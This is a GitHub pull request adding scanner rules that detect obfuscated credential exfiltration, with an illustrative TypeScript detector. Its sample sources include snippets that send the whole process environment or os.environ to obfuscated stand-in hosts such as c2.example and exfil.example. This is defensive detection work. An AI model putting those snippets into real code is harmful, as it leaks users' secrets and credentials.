
scanner: detect obfuscated credential exfiltration patterns#19

Open
yuliuyi717-ux wants to merge 1 commit into counterspec:main from yuliuyi717-ux:codex/obfuscated-exfil-detection-issue-1

Conversation

@yuliuyi717-ux

Summary

  • add new detector signatures for obfuscated exfiltration techniques:
    • base64-decoded URL literals
    • hex-escaped URL literals inside network calls
    • charcode URL construction
    • reversed-string URL decoding
    • concatenated URL assembly
  • add correlated critical finding EXFIL_ENV_OBFUSCATED_TRANSMISSION when env harvesting + obfuscation + network transmission co-occur
  • tighten sensitive file regex to avoid process.env false positives
  • make allowlist matching non-stateful and keep it narrow

Test corpus (10 cases)

Added scanner/src/analyzer.obfuscation.test.ts with 10 malware-technique-oriented scenarios:

  1. base64 URL decode + fetch
  2. hex URL literal + fetch
  3. charcode URL + axios
  4. reversed string endpoint
  5. concatenated endpoint
  6. env harvest + base64 + reversed endpoint
  7. python os.environ + base64.b64encode + requests.post
  8. python os.environ + urllib3 + reversed endpoint slicing
  9. negative: benign base64 binary decode
  10. negative: benign axios API call

Verification

  • cd scanner && npm test
  • cd scanner && npm run build

Fixes #1
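As an added illustration of the detection logic this PR describes (example code written for this page, not the counterspec scanner's own analyzer or its test file), the TypeScript below recovers a URL from each of the five obfuscation idioms in the summary, then raises the correlated critical finding only when a whole-environment read and a network sink are present in the same source. Only the name EXFIL_ENV_OBFUSCATED_TRANSMISSION comes from the PR; the other rule names, the regexes, the severity values and the constructed sample sources are assumptions made here. The two negative samples mirror cases 9 and 10 of the PR's corpus: a base64 literal that decodes to binary and a plain API call that reads a single env var must produce no findings.

```typescript
// Added example, not the counterspec scanner's code. Rule names other than
// EXFIL_ENV_OBFUSCATED_TRANSMISSION, all regexes and all samples are assumptions.

interface Finding { rule: string; severity: "high" | "critical"; evidence: string; }
interface Detector { rule: string; re: RegExp; needs?: RegExp; recover: (m: RegExpExecArray) => string; }

// A recovered string counts only if the whole of it is an http(s) URL.
const URL_RE = /^https?:\/\/[a-z0-9.-]+(?::\d+)?(?:\/[^\s'"]*)?$/i;
// Network sinks and bulk environment reads in the JS and Python shapes the PR corpus names.
// Single-variable reads (process.env.X, os.environ["X"], os.environ.get) are deliberately excluded.
const NETWORK_SINK_RE = /\b(?:fetch|axios(?:\.\w+)?|requests\.(?:post|get|put)|urllib3\.PoolManager|https?\.request|XMLHttpRequest)\s*\(|\.request\s*\(/;
const ENV_HARVEST_RE = /JSON\.stringify\(\s*process\.env\s*\)|Object\.(?:keys|entries|values)\(\s*process\.env\s*\)|\bprocess\.env\b(?![.\[])|\bos\.environ\b(?!\.get\b|\[)/;

const B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
// Minimal base64 decoder (no Buffer/atob dependency); returns a Latin-1 string,
// which is enough to recognise an ASCII URL and rejects non-base64 input with "".
function base64Decode(s: string): string {
  let acc = 0, bits = 0, out = "";
  const body = s.replace(/=+$/, "");
  for (let i = 0; i < body.length; i++) {
    const v = B64.indexOf(body.charAt(i));
    if (v < 0) return "";
    acc = ((acc << 6) | v) & 0xffff;
    bits += 6;
    if (bits >= 8) { bits -= 8; out += String.fromCharCode((acc >> bits) & 0xff); }
  }
  return out;
}

function decodeHexEscapes(lit: string): string {
  return lit.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// One entry per obfuscation idiom: a pattern that finds candidates and a recovery step.
const DETECTORS: Detector[] = [
  { rule: "OBF_URL_BASE64", re: /['"]([A-Za-z0-9+/]{16,}={0,2})['"]/g, recover: m => base64Decode(m[1]) },
  { rule: "OBF_URL_HEX_ESCAPE", re: /['"]((?:\\x[0-9a-fA-F]{2}){8,})['"]/g, recover: m => decodeHexEscapes(m[1]) },
  { rule: "OBF_URL_CHARCODE", re: /String\.fromCharCode\(\s*([\d\s,]+)\)/g,
    recover: m => m[1].split(",").filter(n => n.trim() !== "").map(n => String.fromCharCode(parseInt(n.trim(), 10))).join("") },
  // Reversed literals are only considered when a reversal idiom (JS or Python) is present in the file.
  { rule: "OBF_URL_REVERSED", re: /['"]([^'"\\]{8,})['"]/g, needs: /\.reverse\(\)|\[::-1\]/,
    recover: m => m[1].split("").reverse().join("") },
  { rule: "OBF_URL_CONCAT", re: /"[^"\\]*"(?:\s*\+\s*"[^"\\]*"){2,}/g,
    recover: m => { const parts: string[] = m[0].match(/"([^"\\]*)"/g) || []; return parts.map(s => s.slice(1, -1)).join(""); } },
];

function scan(src: string): Finding[] {
  const findings: Finding[] = [];
  const seen: { [key: string]: boolean } = {};
  for (const d of DETECTORS) {
    if (d.needs && !d.needs.test(src)) continue;
    d.re.lastIndex = 0;
    let m: RegExpExecArray | null;
    while ((m = d.re.exec(src)) !== null) {
      const url = d.recover(m);
      if (URL_RE.test(url) && !seen[d.rule + url]) {
        seen[d.rule + url] = true;
        findings.push({ rule: d.rule, severity: "high", evidence: url });
      }
    }
  }
  // Correlation: obfuscated endpoint + bulk env read + network sink => critical.
  if (findings.length > 0 && ENV_HARVEST_RE.test(src) && NETWORK_SINK_RE.test(src)) {
    findings.push({ rule: "EXFIL_ENV_OBFUSCATED_TRANSMISSION", severity: "critical",
      evidence: findings.map(f => f.evidence).join(", ") });
  }
  return findings;
}

function rulesFor(src: string): string[] { return scan(src).map(f => f.rule); }

// Constructed samples (not from the PR's test file); "\\x68..." yields a literal \x68 in the scanned text.
const SAMPLES = {
  base64EnvExfil: 'const u = Buffer.from("aHR0cHM6Ly9leGFtcGxlLmNvbS9jb2xsZWN0", "base64").toString();\n' +
    'fetch(u, { method: "POST", body: JSON.stringify(process.env) });',
  hexUrl: 'fetch("\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x65\\x76\\x69\\x6c\\x2e\\x65\\x78\\x61\\x6d\\x70\\x6c\\x65");',
  charcodeAxios: 'axios.post(String.fromCharCode(104,116,116,112,115,58,47,47,99,50,46,101,120,97,109,112,108,101), data);',
  reversedPython: 'url = "tcelloc/moc.elpmaxe//:sptth"[::-1]\n' +
    'requests.post(url, data=base64.b64encode(json.dumps(dict(os.environ)).encode()))',
  concat: 'const ep = "htt" + "ps://" + "exfil.example" + "/drop";\nhttp.request(ep);',
  benignBase64: 'const png = Buffer.from("iVBORw0KGgoAAAANSUhEUgAAAAEAAAAB", "base64");',
  benignAxios: 'axios.get("https://api.example.com/users", { headers: { auth: process.env.API_TOKEN } });',
};

function runCorpus(): { [name: string]: string[] } {
  const out: { [name: string]: string[] } = {};
  const table = SAMPLES as { [k: string]: string };
  for (const name in table) out[name] = rulesFor(table[name]);
  return out;
}

console.log(JSON.stringify(runCorpus(), null, 2));
```

The point worth taking from the layout is that each decoder is judged by what it recovers, not by the idiom alone: a base64 literal or a `String.fromCharCode` call is only a finding when the result parses as a URL, which is what keeps the PNG-header sample quiet, and the critical finding is gated on all three signals co-occurring in the same source, which is what keeps a plain `axios.get` with one `process.env.API_TOKEN` read from escalating.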

@vercel

vercel bot commented Feb 27, 2026

@yuliuyi717-ux is attempting to deploy a commit to the Rapi's projects Team on Vercel.

A member of the Team first needs to authorize it.


Development

Successfully merging this pull request may close these issues.

Detect obfuscated credential exfiltration patterns
